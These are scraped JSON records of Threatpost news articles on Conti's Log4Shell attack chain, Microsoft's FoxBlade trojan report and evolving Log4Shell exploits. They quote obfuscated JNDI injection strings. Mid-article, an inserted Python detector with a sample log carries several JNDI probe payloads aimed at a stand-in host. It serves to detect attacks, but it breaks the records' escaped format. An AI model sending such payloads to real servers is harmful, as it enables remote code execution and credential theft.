today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. 
AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s use of the Atera Agent allows the gang to gain persistence on infected, protected environments, especially those equipped with more aggressive machine-learning-based endpoint detection and response anti-virus products. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New [backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive [Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. 
Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. 
Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T16:59:59", "description": "\u201cAs tanks rolled into Ukraine, so did malware,\u201d [summarized](<https://twitter.com/andreasharsono/status/1498631557392715777>) humanitarian author Andreas Harsono, referring to the [novel malware](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>) that Microsoft has named FoxBlade.\n\nOn Monday, the company reported that its Threat Intelligence Center (MSTIC) had detected cyberattacks launched against Ukraine\u2019s digital infrastructure hours before Russia\u2019s tanks and missiles began to pummel the country on Thursday.\n\n\u201cSeveral hours before the launch of missiles or movement of tanks on February 24, Microsoft\u2019s Threat Intelligence Center (MSTIC) detected a new round of offensive and destructive cyberattacks directed against Ukraine\u2019s digital infrastructure,\u201d Microsoft President and Vice-Chair Brad Smith [said](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>).\n\n\u201cWe immediately advised the Ukrainian government about the situation, including our identification of the use of a new malware package (which we denominated FoxBlade), and provided technical advice on steps to prevent the malware\u2019s success.\u201d\n\nSmith said that within three hours of discovering FoxBlade, Microsoft had added new signatures to its Defender anti-malware service to detect the exploit.\n\n## FoxBlade Specifics\n\nMicrosoft has issued a Security Intelligence [advisory](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=DoS:Win32/FoxBlade.A!dha>) about FoxBlade, which is a novel trojan.\n\nWhile the company shared neither technical specifics nor details about how FoxBlade achieves initial access on targeted machines, the advisory did explain that \u201cThis[ 
trojan](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx#trojan>) can use your PC for[ distributed denial-of-service (DDoS)](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx##ddos>) attacks without your knowledge.\u201d\n\nSuch attacks [topped thousands](<https://threatpost.com/ddos-attacks-records-q3/176082/>) daily in Q3 and were expected to keep growing, Kaspersky researchers reported in November 2021.\n\nBeyond launching DDoS attacks, FoxBlade also downloads and installs other programs \u2013 including other malware \u2013 onto infected systems, Microsoft [advised](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/FoxBlade.B!dha>).\n\n## \u2018Precisely Targeted\u2019\n\nThe cyberattacks \u2013 which were ongoing as of Monday, Smith said \u2013 have been \u201cprecisely targeted,\u201d unlike the indiscriminate malware splattered in the NotPetya attack. The NotPetya cyberattack [targeted hundreds of firms and hospitals worldwide in 2017](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), including Ukraine\u2019s power grid.\n\nIn 2020, the U.S. 
Department of Justice (DOJ) [charged](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) six Russian nationals for their alleged part in the Ukraine and other cyberattacks.\n\nRegardless of the targeted nature of the current cyberattacks on Ukraine, Smith said Microsoft is still \u201cespecially concerned\u201d about recent cyberattacks aimed at Ukrainian civilian digital targets that have been more wide-ranging, including those fired at the financial sector, agriculture sector, emergency response services, humanitarian aid efforts, and energy sector organizations and enterprises.\n\n\u201cThese attacks on civilian targets raise serious concerns under the Geneva Convention, and we have shared information with the Ukrainian government about each of them,\u201d Smith said.\n\nMicrosoft has also advised the Ukrainian government about recent cyber efforts to steal a range of personally identifiable information (PII), including PII related to health, insurance, transportation and other government data.\n\nMicrosoft has also passed on threat intelligence and defensive strategies to Ukraine\u2019s government so that it could better defend against attacks on military institutions and manufacturers and several other Ukrainian government agencies.\n\n\u201cThis work is ongoing,\u201d Smith said.\n\n## The Ongoing Cyberwar\n\nMicrosoft\u2019s news about FoxBlade comes as just one of a continuing barrage of cyber assaults targeting both Ukraine and Russia: a barrage that\u2019s included the Conti ransomware gang proclaiming that it\u2019s pro-Russia. 
Last week, the extortionists [blared](<https://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion.ly/>) out a warning on their blog, threatening to use Conti\u2019s \u201cfull capacity\u201d to retaliate in the face of \u201cWestern warmongers attempt to target critical infrastructure in Russia or any Russian-speaking region of the world.\u201d\n\nA pro-Ukraine Conti ransomware gang member subsequently [spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) 13 months of the ransomware group\u2019s chats, promising more still to come.\n\nAs well, [ESET](<https://twitter.com/ESETresearch/status/1496581903205511181>) and Broadcom\u2019s [Symantec](<https://twitter.com/threatintel/status/1496578746014437376>) last week said that they had discovered a new data wiper malware dubbed [**HermeticWiper**](<https://twitter.com/juanandres_gs/status/1496581710368358400>) that\u2019s been used against hundreds of machines in Ukraine. One of the malware samples was compiled back on Dec. 28, pointing to the attacks having been readied two months ago.\n\nThen, on Jan. 13, a destructive wiper malware \u2013 posing as ransomware attacks \u2013 named WhisperGate began to [target](<https://threatpost.com/destructive-wiper-ukraine/177768/>) Ukrainian organizations: an attack that analysts said was likely part of Russia\u2019s wider effort to undermine Ukraine\u2019s sovereignty.\n\nAs well, in mid-February, institutions central to Ukraine\u2019s military and economy \u2013 including government and banking websites \u2013 were slammed with a [wave](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) of DDoS attacks.\n\n## CISA\u2019s Take-Shelter Advice\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) [last week warned](<https://www.cisa.gov/uscert/shields-technical-guidance>) that such attacks could spill over Ukraine\u2019s borders.\n\n\u201cDestructive malware can present a direct threat to an organization\u2019s daily operations, impacting the availability of critical assets and data,\u201d CISA [said](<https://www.cisa.gov/uscert/ncas/alerts/aa22-057a>). \u201cFurther disruptive cyberattacks against organizations in Ukraine are likely to occur and may unintentionally spill over to organizations in other countries.\u201d\n\nOther threats related to the Ukraine/Russia crisis include the typical swarm of threat actors who jump into the fray to exploit the day\u2019s headlines, which, in this situation, convey the haze and confusion of war. Case in point: Malwarebytes has uncovered a spate of [malicious email](<https://threatpost.com/microsoft-accounts-targeted-russian-credential-harvesting/178698/>) bearing the subject line \u201cMicrosoft account unusual sign-in activity.\u201d\n\nCISA provided this list of \u201cImmediate Shields Up Actions\u201d to protect against this wide range of cyber threats:\n\n * Patch [vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n * Use [MFA](<https://us-cert.cisa.gov/ncas/tips/ST05-012>).\n * Run antivirus.\n * Enable strong spam filters to prevent phishing emails from reaching end users.\n * Disable ports and protocols that are not essential.\n * Strengthen [controls for cloud services](<https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-013a>).\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T16:55:47", "type": "threatpost", "title": "Ukraine Hit with Novel 'FoxBlade' Trojan Hours Before Invasion", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T16:55:47", "id": "THREATPOST:503327A6AB0C76621D741E281ABCFF77", "href": "https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly 
mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by [Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. 
Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. 
\u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. 
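Both the base64 stuffing Richards describes here and the nested-lookup trick in the examples he gives next are aimed at the same weak control: a pattern match on the literal string `${jndi:` in a request. A detector has to do what Log4j does and resolve the lookups first. The Python helper below is an added example written for this article, not code from Vectra, Threatpost or the Log4j project. It models only a subset of the Log4j 2 string-substitution rules, and that subset is an assumption: lookups resolve innermost-first, `lower:` and `upper:` change the case of their argument, and runtime lookups such as `env:` are treated as unset so they yield their `:-` default, which is exactly what an obfuscating attacker counts on. It URL-decodes the request, normalizes it, and reports any JNDI lookup that survives. The access-log lines are constructed for the example, and `203.0.113.10` is documentation address space.

```python
"""Spot Log4Shell (CVE-2021-44228) probes hidden behind Log4j lookup nesting.

Added example; not Vectra's, Threatpost's or the Log4j project's code. Only a
subset of Log4j 2's substitution rules is modelled (an assumption):
  * nested ${...} lookups resolve innermost-first;
  * ${lower:X} / ${upper:X} change the case of X;
  * runtime lookups (${env:NAME:-dflt}, ${::-x}, ${sys:...}, ${date:...}) are
    treated as unset, so they yield their ':-' default or nothing;
  * anything else, including ${jndi:...}, is kept literal so it stays visible.
Log lines below are constructed for the example (203.0.113.0/24 is TEST-NET-3).
"""
import re
from urllib.parse import unquote

# Innermost lookup only: a body with no braces cannot contain another ${...}.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")

# Prefixes that read runtime state; '' covers the ${::-x} form.
RUNTIME_PREFIXES = {"", "env", "sys", "date", "ctx", "main", "bundle", "java",
                    "spring", "k8s", "docker", "marker", "log4j", "sd", "map",
                    "event", "jvmrunargs", "web"}

# A JNDI lookup that survived normalisation: ${jndi:<scheme>://<host[:port]>
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s\"]*)", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Resolve one brace-free lookup body such as 'lower:L' or 'env:X:-j'."""
    prefix, sep, rest = body.partition(":")
    if not sep:                      # plain ${name}: unresolvable, left as-is
        return "${" + body + "}"
    key = prefix.lower()             # lookup prefixes are matched case-insensitively
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    if key in RUNTIME_PREFIXES:
        _name, has_default, default = rest.partition(":-")
        return default if has_default else ""
    return "${" + body + "}"         # jndi: and unknown prefixes stay literal


def normalize(text: str, max_rounds: int = 32) -> str:
    """URL-decode (tolerating double encoding), then resolve lookups to a fixed point."""
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        changed = False

        def repl(match):
            nonlocal changed
            out = resolve_lookup(match.group(1))
            if out != match.group(0):
                changed = True
            return out

        text = LOOKUP_RE.sub(repl, text)
        if not changed:
            break
    return text


def find_jndi(request: str):
    """Return (scheme, target, normalized_text) for a JNDI probe, else None."""
    norm = normalize(request)
    match = JNDI_RE.search(norm)
    if not match:
        return None
    return match.group(1).lower(), match.group(2), norm


def scan_log(log_text: str):
    """Apply find_jndi to every access-log line; return [(line_no, scheme, target)]."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        found = find_jndi(line)
        if found:
            hits.append((line_no, found[0], found[1]))
    return hits


# Constructed access-log sample: one benign line, then the plain probe, the
# ${lower:} nesting Richards quotes, a URL-encoded copy of his ${env:} variant,
# the ${::-x} style, and a harmless lookup that must not trigger.
SAMPLE_LOG = "\n".join([
    '10.0.0.7 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /?x=%24%7B%24%7Benv%3AENV_NAME%3A-j%7Dn%24%7Benv%3AENV_NAME%3A-d%7Di%24%7Benv%3AENV_NAME%3A-%3A%7D%24%7Benv%3AENV_NAME%3A-l%7Dd%24%7Benv%3AENV_NAME%3A-a%7Dp%24%7Benv%3AENV_NAME%3A-%3A%7D%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-d}ns://203.0.113.10/x}"',
    '10.0.0.4 - - [13/Dec/2021:10:02:00 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
])

if __name__ == "__main__":
    for line_no, scheme, target in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: jndi {scheme}:// -> {target}")
```

Run as a script it lists the four probes in the sample and ignores the benign lines. Two caveats follow from the assumptions: normalisation is a fixed-point loop, so deeply nested payloads cost one pass per level and the round cap keeps a hostile input from spinning; and because runtime lookups are modelled as unset, a payload built around a variable the target actually defines would resolve differently on the victim. Treat the helper as a hunting filter over logs, not as a substitute for patching.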
Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) lookup string itself, by taking advantage of Log4j\u2019s other lookup types (such as `lower` and `env`), which the library resolves before the JNDI lookup runs.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 
11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. \u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. 
Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * [**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. 
Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. [BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201cWe need to scan all of our systems,\u201d said Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. 
\u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * 
